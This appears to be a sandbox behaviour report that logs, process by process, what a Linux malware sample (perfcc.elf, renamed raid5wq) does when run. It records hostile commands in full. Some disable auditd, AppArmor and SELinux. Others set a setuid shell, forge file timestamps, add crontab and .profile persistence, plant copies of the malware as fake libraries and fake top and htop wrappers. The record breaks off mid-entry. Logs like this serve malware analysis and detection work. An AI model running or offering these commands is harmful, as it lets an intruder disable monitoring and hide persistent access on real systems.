MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	11:00:31
Start date (UTC):	10/10/2024
Path:	/usr/bin/nohup
Arguments:	nohup /tmp/perfcc.elf
File size:	43352 bytes
MD5 hash:	d8d3ce4d7f4b1e3ac3c3e7c9790f22ca

Start time (UTC):	11:00:31
Start date (UTC):	10/10/2024
Path:	/tmp/perfcc.elf
Arguments:	/tmp/perfcc.elf
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Start time (UTC):	11:00:31
Start date (UTC):	10/10/2024
Path:	/tmp/perfcc.elf
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Start time (UTC):	11:00:31
Start date (UTC):	10/10/2024
Path:	/usr/bin/getconf
Arguments:	getconf CLK_TCK
File size:	35112 bytes
MD5 hash:	4c206cdb0a9f19e43beb204006c4067f

Start time (UTC):	11:00:31
Start date (UTC):	10/10/2024
Path:	/tmp/perfcc.elf
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Start time (UTC):	11:00:31
Start date (UTC):	10/10/2024
Path:	/usr/bin/getconf
Arguments:	getconf PAGESIZE
File size:	35112 bytes
MD5 hash:	4c206cdb0a9f19e43beb204006c4067f

Start time (UTC):	11:00:38
Start date (UTC):	10/10/2024
Path:	/tmp/perfcc.elf
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Start time (UTC):	11:00:38
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "cp /proc/6252/exe /tmp/.perf.c/raid5wq && chmod +x /tmp/.perf.c/raid5wq"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	11:00:38
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	11:00:38
Start date (UTC):	10/10/2024
Path:	/usr/bin/cp
Arguments:	cp /proc/6252/exe /tmp/.perf.c/raid5wq
File size:	153976 bytes
MD5 hash:	40f10ae7ea3e44218d1a8c306f79c83f

Start time (UTC):	11:00:40
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	11:00:40
Start date (UTC):	10/10/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /tmp/.perf.c/raid5wq
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	11:00:40
Start date (UTC):	10/10/2024
Path:	/tmp/perfcc.elf
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Start time (UTC):	11:00:40
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "PATH=/tmp/.perf.c:/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin;raid5wq -p &"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	11:00:41
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	11:00:41
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	raid5wq -p
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Start time (UTC):	11:00:41
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: getconf PID: 6274, Parent PID: 6269

General

Start time (UTC):	11:00:41
Start date (UTC):	10/10/2024
Path:	/usr/bin/getconf
Arguments:	getconf CLK_TCK
File size:	35112 bytes
MD5 hash:	4c206cdb0a9f19e43beb204006c4067f

Analysis Process: raid5wq PID: 6276, Parent PID: 6269

General

Start time (UTC):	11:00:41
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: getconf PID: 6276, Parent PID: 6269

General

Start time (UTC):	11:00:41
Start date (UTC):	10/10/2024
Path:	/usr/bin/getconf
Arguments:	getconf PAGESIZE
File size:	35112 bytes
MD5 hash:	4c206cdb0a9f19e43beb204006c4067f

Analysis Process: raid5wq PID: 6279, Parent PID: 6269

General

Start time (UTC):	11:00:41
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6279, Parent PID: 6269

General

Start time (UTC):	11:00:41
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "auditctl -e0"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: raid5wq PID: 6280, Parent PID: 6269

General

Start time (UTC):	11:00:42
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6280, Parent PID: 6269

General

Start time (UTC):	11:00:42
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "echo 0 > /sys/fs/selinux/enforce"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: raid5wq PID: 6281, Parent PID: 6269

General

Start time (UTC):	11:00:42
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6281, Parent PID: 6269

General

Start time (UTC):	11:00:42
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "setenforce 0"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: raid5wq PID: 6308, Parent PID: 6269

General

Start time (UTC):	11:00:50
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6308, Parent PID: 6269

General

Start time (UTC):	11:00:50
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "if systemctl status auditd\|grep -q 'enabled;';then systemctl stop auditd;systemctl disable auditd;fi"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6309, Parent PID: 6308

General

Start time (UTC):	11:00:50
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: systemctl PID: 6309, Parent PID: 6308

General

Start time (UTC):	11:00:50
Start date (UTC):	10/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl status auditd
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Analysis Process: sh PID: 6310, Parent PID: 6308

General

Start time (UTC):	11:00:50
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: grep PID: 6310, Parent PID: 6308

General

Start time (UTC):	11:00:50
Start date (UTC):	10/10/2024
Path:	/usr/bin/grep
Arguments:	grep -q enabled;
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Analysis Process: raid5wq PID: 6311, Parent PID: 6269

General

Start time (UTC):	11:00:50
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6311, Parent PID: 6269

General

Start time (UTC):	11:00:50
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "if systemctl status apparmor\|grep -q 'enabled;';then systemctl stop apparmor;systemctl disable apparmor;fi"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6312, Parent PID: 6311

General

Start time (UTC):	11:00:50
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: systemctl PID: 6312, Parent PID: 6311

General

Start time (UTC):	11:00:50
Start date (UTC):	10/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl status apparmor
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Analysis Process: sh PID: 6313, Parent PID: 6311

General

Start time (UTC):	11:00:50
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: grep PID: 6313, Parent PID: 6311

General

Start time (UTC):	11:00:50
Start date (UTC):	10/10/2024
Path:	/usr/bin/grep
Arguments:	grep -q enabled;
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Analysis Process: sh PID: 6314, Parent PID: 6311

General

Start time (UTC):	11:00:51
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: systemctl PID: 6314, Parent PID: 6311

General

Start time (UTC):	11:00:51
Start date (UTC):	10/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl stop apparmor
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Analysis Process: sh PID: 6316, Parent PID: 6311

General

Start time (UTC):	11:00:52
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: systemctl PID: 6316, Parent PID: 6311

General

Start time (UTC):	11:00:52
Start date (UTC):	10/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl disable apparmor
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Analysis Process: systemctl PID: 6317, Parent PID: 6316

General

Start time (UTC):	11:00:53
Start date (UTC):	10/10/2024
Path:	/usr/bin/systemctl
Arguments:	-
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Analysis Process: systemd-sysv-install PID: 6317, Parent PID: 6316

General

Start time (UTC):	11:00:53
Start date (UTC):	10/10/2024
Path:	/lib/systemd/systemd-sysv-install
Arguments:	/lib/systemd/systemd-sysv-install disable apparmor
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: systemd-sysv-install PID: 6320, Parent PID: 6317

General

Start time (UTC):	11:00:53
Start date (UTC):	10/10/2024
Path:	/lib/systemd/systemd-sysv-install
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: getopt PID: 6320, Parent PID: 6317

General

Start time (UTC):	11:00:53
Start date (UTC):	10/10/2024
Path:	/usr/bin/getopt
Arguments:	getopt -o r: --long root: -- disable apparmor
File size:	22760 bytes
MD5 hash:	1a12f43596437b1bf346d52618b3b1b7

Analysis Process: systemd-sysv-install PID: 6321, Parent PID: 6317

General

Start time (UTC):	11:00:54
Start date (UTC):	10/10/2024
Path:	/lib/systemd/systemd-sysv-install
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: update-rc.d PID: 6321, Parent PID: 6317

General

Start time (UTC):	11:00:54
Start date (UTC):	10/10/2024
Path:	/usr/sbin/update-rc.d
Arguments:	/usr/sbin/update-rc.d apparmor defaults
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Analysis Process: update-rc.d PID: 6322, Parent PID: 6321

General

Start time (UTC):	11:00:54
Start date (UTC):	10/10/2024
Path:	/usr/sbin/update-rc.d
Arguments:	-
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Analysis Process: systemctl PID: 6322, Parent PID: 6321

General

Start time (UTC):	11:00:54
Start date (UTC):	10/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Analysis Process: systemd-sysv-install PID: 6327, Parent PID: 6317

General

Start time (UTC):	11:00:55
Start date (UTC):	10/10/2024
Path:	/lib/systemd/systemd-sysv-install
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: update-rc.d PID: 6327, Parent PID: 6317

General

Start time (UTC):	11:00:55
Start date (UTC):	10/10/2024
Path:	/usr/sbin/update-rc.d
Arguments:	/usr/sbin/update-rc.d apparmor disable
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Analysis Process: update-rc.d PID: 6328, Parent PID: 6327

General

Start time (UTC):	11:00:56
Start date (UTC):	10/10/2024
Path:	/usr/sbin/update-rc.d
Arguments:	-
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Analysis Process: systemctl PID: 6328, Parent PID: 6327

General

Start time (UTC):	11:00:56
Start date (UTC):	10/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Analysis Process: raid5wq PID: 6329, Parent PID: 6269

General

Start time (UTC):	11:00:56
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6329, Parent PID: 6269

General

Start time (UTC):	11:00:56
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "chmod 4755 /bin/wizlmsh"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6330, Parent PID: 6329

General

Start time (UTC):	11:00:56
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: chmod PID: 6330, Parent PID: 6329

General

Start time (UTC):	11:00:56
Start date (UTC):	10/10/2024
Path:	/usr/bin/chmod
Arguments:	chmod 4755 /bin/wizlmsh
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Analysis Process: raid5wq PID: 6334, Parent PID: 6269

General

Start time (UTC):	11:00:56
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6334, Parent PID: 6269

General

Start time (UTC):	11:00:56
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "touch -acmr /bin/sh /bin/wizlmsh"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6337, Parent PID: 6334

General

Start time (UTC):	11:00:57
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: touch PID: 6337, Parent PID: 6334

General

Start time (UTC):	11:00:57
Start date (UTC):	10/10/2024
Path:	/usr/bin/touch
Arguments:	touch -acmr /bin/sh /bin/wizlmsh
File size:	100728 bytes
MD5 hash:	3859c173f5d3b37be3e531b7c84a9c68

Analysis Process: raid5wq PID: 6361, Parent PID: 6269

General

Start time (UTC):	11:01:04
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6361, Parent PID: 6269

General

Start time (UTC):	11:01:04
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "touch -acmr /bin/sh /bin/perfcc"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6362, Parent PID: 6361

General

Start time (UTC):	11:01:04
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: touch PID: 6362, Parent PID: 6361

General

Start time (UTC):	11:01:04
Start date (UTC):	10/10/2024
Path:	/usr/bin/touch
Arguments:	touch -acmr /bin/sh /bin/perfcc
File size:	100728 bytes
MD5 hash:	3859c173f5d3b37be3e531b7c84a9c68

Analysis Process: raid5wq PID: 6366, Parent PID: 6269

General

Start time (UTC):	11:01:10
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6366, Parent PID: 6269

General

Start time (UTC):	11:01:10
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "(crontab -l\|grep -v -e perfcc -e /tmp/.perf;echo '11 * * * * /root/.config/cron/perfcc')\|crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6367, Parent PID: 6366

General

Start time (UTC):	11:01:10
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6369, Parent PID: 6367

General

Start time (UTC):	11:01:10
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: crontab PID: 6369, Parent PID: 6367

General

Start time (UTC):	11:01:10
Start date (UTC):	10/10/2024
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Analysis Process: sh PID: 6370, Parent PID: 6367

General

Start time (UTC):	11:01:10
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: grep PID: 6370, Parent PID: 6367

General

Start time (UTC):	11:01:10
Start date (UTC):	10/10/2024
Path:	/usr/bin/grep
Arguments:	grep -v -e perfcc -e /tmp/.perf
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Analysis Process: sh PID: 6368, Parent PID: 6366

General

Start time (UTC):	11:01:10
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: crontab PID: 6368, Parent PID: 6366

General

Start time (UTC):	11:01:10
Start date (UTC):	10/10/2024
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Analysis Process: raid5wq PID: 6371, Parent PID: 6269

General

Start time (UTC):	11:01:11
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6371, Parent PID: 6269

General

Start time (UTC):	11:01:11
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "sed -n -i '/perfcc/d;p;1a test -x /bin/perfcc && FPROF=p /bin/perfcc' /root/.profile;touch -acmr /bin/sh /root/.profile"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6372, Parent PID: 6371

General

Start time (UTC):	11:01:11
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sed PID: 6372, Parent PID: 6371

General

Start time (UTC):	11:01:11
Start date (UTC):	10/10/2024
Path:	/usr/bin/sed
Arguments:	sed -n -i "/perfcc/d;p;1a test -x /bin/perfcc && FPROF=p /bin/perfcc" /root/.profile
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Analysis Process: sh PID: 6373, Parent PID: 6371

General

Start time (UTC):	11:01:11
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: touch PID: 6373, Parent PID: 6371

General

Start time (UTC):	11:01:11
Start date (UTC):	10/10/2024
Path:	/usr/bin/touch
Arguments:	touch -acmr /bin/sh /root/.profile
File size:	100728 bytes
MD5 hash:	3859c173f5d3b37be3e531b7c84a9c68

Analysis Process: raid5wq PID: 6374, Parent PID: 6269

General

Start time (UTC):	11:01:11
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6374, Parent PID: 6269

General

Start time (UTC):	11:01:11
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "cp /proc/6269/exe /lib/libpprocps.so && chmod +x /lib/libpprocps.so"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6375, Parent PID: 6374

General

Start time (UTC):	11:01:11
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: cp PID: 6375, Parent PID: 6374

General

Start time (UTC):	11:01:11
Start date (UTC):	10/10/2024
Path:	/usr/bin/cp
Arguments:	cp /proc/6269/exe /lib/libpprocps.so
File size:	153976 bytes
MD5 hash:	40f10ae7ea3e44218d1a8c306f79c83f

Analysis Process: sh PID: 6378, Parent PID: 6374

General

Start time (UTC):	11:01:16
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: chmod PID: 6378, Parent PID: 6374

General

Start time (UTC):	11:01:16
Start date (UTC):	10/10/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /lib/libpprocps.so
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Analysis Process: raid5wq PID: 6379, Parent PID: 6269

General

Start time (UTC):	11:01:16
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6379, Parent PID: 6269

General

Start time (UTC):	11:01:16
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "cp /proc/6269/exe /lib/libfsnldev.so && chmod +x /lib/libfsnldev.so"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6380, Parent PID: 6379

General

Start time (UTC):	11:01:16
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: cp PID: 6380, Parent PID: 6379

General

Start time (UTC):	11:01:16
Start date (UTC):	10/10/2024
Path:	/usr/bin/cp
Arguments:	cp /proc/6269/exe /lib/libfsnldev.so
File size:	153976 bytes
MD5 hash:	40f10ae7ea3e44218d1a8c306f79c83f

Analysis Process: sh PID: 6385, Parent PID: 6379

General

Start time (UTC):	11:01:20
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: chmod PID: 6385, Parent PID: 6379

General

Start time (UTC):	11:01:20
Start date (UTC):	10/10/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /lib/libfsnldev.so
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Analysis Process: raid5wq PID: 6386, Parent PID: 6269

General

Start time (UTC):	11:01:20
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: top PID: 6386, Parent PID: 6269

General

Start time (UTC):	11:01:20
Start date (UTC):	10/10/2024
Path:	/bin/.local/bin/top
Arguments:	/bin/.local/bin/top
File size:	15880 bytes
MD5 hash:	da006a0b9b51d56fa3f9690cf204b99f

Analysis Process: bash PID: 6386, Parent PID: 6269

General

Start time (UTC):	11:01:20
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	/bin/.local/bin/top -c "exec '/bin/.local/bin/top' \"$@\"" /bin/.local/bin/top
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: top PID: 6386, Parent PID: 6269

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/bin/.local/bin/top
Arguments:	/bin/.local/bin/top
File size:	15880 bytes
MD5 hash:	da006a0b9b51d56fa3f9690cf204b99f

Analysis Process: bash PID: 6386, Parent PID: 6269

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	/bin/.local/bin/top -c " " /bin/.local/bin/top
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: bash PID: 6387, Parent PID: 6386

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: env PID: 6387, Parent PID: 6386

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/usr/bin/env
Arguments:	env
File size:	43352 bytes
MD5 hash:	a07608ea9b03212885b826d00c37f0ab

Analysis Process: bash PID: 6388, Parent PID: 6386

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: grep PID: 6388, Parent PID: 6386

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/usr/bin/grep
Arguments:	grep -q ABWTRX
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Analysis Process: raid5wq PID: 6389, Parent PID: 6269

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: htop PID: 6389, Parent PID: 6269

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/bin/.local/bin/htop
Arguments:	/bin/.local/bin/htop
File size:	15952 bytes
MD5 hash:	ad37b13e2476f8e15cf0d22652895d1d

Analysis Process: bash PID: 6389, Parent PID: 6269

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	/bin/.local/bin/htop -c "exec '/bin/.local/bin/htop' \"$@\"" /bin/.local/bin/htop
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: htop PID: 6389, Parent PID: 6269

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/bin/.local/bin/htop
Arguments:	/bin/.local/bin/htop
File size:	15952 bytes
MD5 hash:	ad37b13e2476f8e15cf0d22652895d1d

Analysis Process: bash PID: 6389, Parent PID: 6269

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	/bin/.local/bin/htop -c " " /bin/.local/bin/htop
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: bash PID: 6390, Parent PID: 6389

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: env PID: 6390, Parent PID: 6389

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/usr/bin/env
Arguments:	env
File size:	43352 bytes
MD5 hash:	a07608ea9b03212885b826d00c37f0ab

Analysis Process: bash PID: 6391, Parent PID: 6389

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Analysis Process: grep PID: 6391, Parent PID: 6389

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/usr/bin/grep
Arguments:	grep -q ABWTRX
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Analysis Process: raid5wq PID: 6392, Parent PID: 6269

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: crontab PID: 6392, Parent PID: 6269

General

Start time (UTC):	11:01:21
Start date (UTC):	10/10/2024
Path:	/bin/.local/bin/crontab
Arguments:	/bin/.local/bin/crontab
File size:	15728 bytes
